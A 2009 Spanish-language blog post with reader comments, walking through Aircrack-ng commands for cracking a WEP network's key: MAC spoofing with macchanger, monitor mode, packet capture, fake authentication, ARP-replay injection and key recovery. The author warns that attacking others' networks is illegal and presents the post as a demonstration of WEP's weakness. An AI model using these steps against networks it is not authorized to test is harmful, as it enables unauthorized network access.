Aircrack-ng: Comandos básicos

Publicado: marzo 11, 2009 en General, GNU/Linux, Manuales/How-To, Seguridad
Etiquetas:, , , , , , , , ,

aircrack-basicosAircrack-ng es una suite de programas para la auditoría de redes inalámbricas.

¿Para qué es utilizado?. Sin duda ha logrado su éxito para realizar ataques a redes inalámbricas ajenas con el objetivo de obtener la contraseña del router para poder acceder a internet entre otras cosas. Esta acción es ILEGAL.

Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles de descifrar y por error para el usuario de una conexión la más común.

Por ello es recomendable no usar encriptación WEP al ser fácilmente vulnerable.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.

¿Qué necesito para usar Aircrack-ng?.

Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red atacada para poder descifrar la clave.

Los programas en cuestión que trae Aircrack-ng así como macchanger.

¿Qué es recomendado tener para usar Aircrack-ng?

Es recomendable que nuestra tarjeta sea compatible con Aireplay-ng (ver lista de compatibilidad). Aireplay-ng es el programa de inyección de paquetes. Éste programa generará más tráfico en la red y por tanto capturaremos más paquetes en mucho menos tiempo.

Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB, ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax, WifiWay

¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB?

Si optas por instalar Aircrack-ng en tu Sistema Operativo puedes pasarte por su web de descargas.

Aircrack-ng Downloads

En Ubuntu, que es la distribución que uso yo:

sudo apt-get install aircrack-ng

Para instalar Macchanger, puedes pasarte por su web

Macchanger Downloads

En Ubuntu:

sudo apt-get install macchanger

Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con clientes asociados. Ten en cuenta que hacer este proceso a una red ajena a la propia es ILEGAL. Prueba con tu red y verás que fácil es de vulnerar.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.

Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando varía según la distribución GNU/Linux que usemos.

sudo su

*** Preparación de la tarjeta

airmon-ng

>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500.

airmon-ng stop ra0

>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.

ifconfig ra0 down

>>tarjeta de red desactiva: no sale nada por pantalla.

macchanger –mac 00:11:22:33:44:55 ra0

>>Current mac: xx:xx:xx:xx:xx:xx    Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.

airmon-ng start ra0

>>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)

*** Escaneo de redes y clientes asociados

airodump-ng ra0

>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR) apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal.

airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado:   airodump-ng -c 11 -w capturaswifi  – – bssid 00:01:02:03:04:C1

>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!

*** Inyección de paquetes para agilizar el proceso de capturas de paquetes

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0

>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID.  Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0.

aireplay-ng -3 –b BSID –h 00:11:22:33:44:55  ra0

>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55  ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!!

*** Crackeo WEP

Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.

Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos.

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aircrack-ng –b BSSID ArchivoDeCapturas.cap

>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.

Con todo ésto podemos ver lo fácil que es vulnerar un red con clave WEP. Por tanto toma medidas!!! La encriptación WEP no es segura!!!

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.

comentarios
  1. […] Guia en español para crackear redes Wifiyisux.wordpress.com/2009/03/11/aircrack-ng-comandos-basicos-… por Ferk hace pocos segundos […]

  2. Pingback en:

    […] Sea cual fuese el sistema operativo que utilicemos, si el mismo es capaz de conectarse a Internet es porque, casi con seguridad, tiene instalado la familia de protocolos TCP/IP. […]

  3. Pingback en:

    […] Encriptación: Definición
    * Es el tratamiento de un conjunto de datos con el fin de impedir que nadie excepto el destinatario de los mismos pueda leerlo. […]

  4. Pingback en:

    […] De como hacerte con una contraseña de una wifi hay muchos manuales escritos, solo quería dejar reflejado en mi blog la manera en que lo hago yo. […]

  5. noimporta dice:

    Gracias mas claro el agua.

  6. JOSE LUIS dice:

    Hola que tal,

    el manual se encuentra excelente segui paso a paso el proceso pero a la hora de utilizar el aireplay-ng -1 6000 -q 10 -o 1 -e BSSID -a MACAP -h MIMAC mon0
    pero obtengo el siguiente mensage
    Waiting for beacon frame (BSSID: 00:26:44:C3:XX:XX) on channel -1
    mon is on channel -1, but the AP uses channel 11

    La verdad no soy novato en linux, ha por cierto mi laptop es NV53A de Gateway y la tarjeta wifi es ATHEROS AR5B93.
    Jose Luis
    adsnet.mx@gmail.com

  7. eesssra dice:

    muy bueno man gracias por el aporte tendre q ver q tan vulnerable es mi red jejeje

  8. Franco dice:

    el codigo para cambiar la direccion mac no lon acepta, al igual que los comandos para inyectar paquetes
    solo me acepta los primeros y me pone error en los essid y bssid, aunque pongo los correctos no me deja avanzar

  9. chireno7 dice:

    si no cambia la mac asegurate de tu tarjeta esta en modo monitor y que es capaz de capturar paquete te recomiendo repetir todos los paso nuevamente

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s